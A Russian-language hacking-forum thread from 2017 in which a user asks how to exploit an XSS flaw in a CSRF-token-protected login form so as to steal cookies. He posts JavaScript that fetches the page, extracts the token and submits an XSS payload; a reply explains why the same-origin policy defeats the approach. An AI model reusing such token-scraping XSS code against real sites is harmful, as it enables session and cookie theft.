HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 10.04.2017, 21:19
sergei_petrovish
Guest
Сообщений: n/a
Провел на форуме:
11346

Репутация: 1
По умолчанию

Как заюзать данную брешь ? форма с iframe не пройдет поскольку токен не пустит. Парсить токен ? Подскажите решение
 
Ответить с цитированием

  #2  
Старый 13.04.2017, 23:48
sergei_petrovish
Guest
Сообщений: n/a
Провел на форуме:
11346

Репутация: 1
По умолчанию

Вот форма уязвимая к XSS . В ней есть токен csrf_tok

Код HTML:
HTML:

  
  
  
document.getElementsByTagName('form')[0].submit();
Для того что бы стырить куки, надо отправить эту форму с правильным токеном. Значит сперва его нужно выдернуть и вставить в свою форму.

Создаю js который вставляю в уязвимое к XSS поле

Код HTML:
HTML:
function request(url, type, callback, send){
      var oReq = new XMLHttpRequest();
      oReq.open(type, url, true);
      oReq.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
      oReq.onload = callback;
      oReq.send(send);
  };
  function getListener () {
      var el = document.createElement('div');
      el.innerHTML = this.responseText;
      request('login', 'POST', postListener, 'csrf_tok=' + el.querySelector('input[name="csrf_tok"]').value + '&Login=alert(xss)'+ '&Pass=12345678');
  };
  function postListener(){
      console.log(this.responseText)
  };
  request('login', 'GET', getListener);
Подскажите где ошибка.
 
Ответить с цитированием

  #3  
Старый 24.04.2017, 14:54
binarymaster
Guest
Сообщений: n/a
Провел на форуме:
997379

Репутация: 125
По умолчанию

Цитата:
Сообщение от sergei_petrovish  
sergei_petrovish said:

Для того что бы стырить куки, надо отправить эту форму с правильным токеном. Значит сперва его нужно выдернуть и вставить в свою форму.
Если XSS работает только при указании правильного токена, вам нужно получить токен. Но получить его без выполнения JS на стороне жертвы не удастся. Взаимоисключение получается.

А спарсить токен со своего домена не получится, ибо кросс-доменная политика запросов не даст.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ